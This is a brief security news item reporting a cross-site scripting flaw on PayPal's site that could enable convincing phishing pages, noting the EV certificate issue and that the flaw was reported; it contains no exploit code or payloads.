Cross-Site Scripting Vulnerability On Paypal Could Be Used In Phishing Attacks
A cross-site scripting vulnerability (XSS) has been found in PayPal, an online payment processing firm website. The vulnerability allows arbitrary code execution and could be used in a phishing attack to gather data from unsuspecting users.
The vulnerability allows a malicious attacker to construct a new page which will appear to be on the paypal.com domain name. This fraudulent page could imitate the PayPal login page and harvest account details. Attackers could carry out highly believable attacks by adding their own content to the site and misleading unsuspecting users.
According to Netcraft, the vulnerability is made worse by the fact that the affected page uses an Extended Validation SSL certificate, which causes the browser’s address bar to turn green, assuring visitors that the site belongs to PayPal. Two years ago, a similar vulnerability was discovered on a different page of the PayPal site, which also used an SSL certificate.
This vulnerability is discovered a month after PayPal published a new approach to managing phishing. Browsers that do not support EV certificates to be considered as unsafe and customers who access their website using unsafe browsers will be blocked.
The vulnerability has been reported to PayPal.
More on CyberInsecure:
Leave a Reply
Comments with unsolicited links to other resources will be marked as spam. DO NOT leave links in comments. Please leave your real email, it wont be published.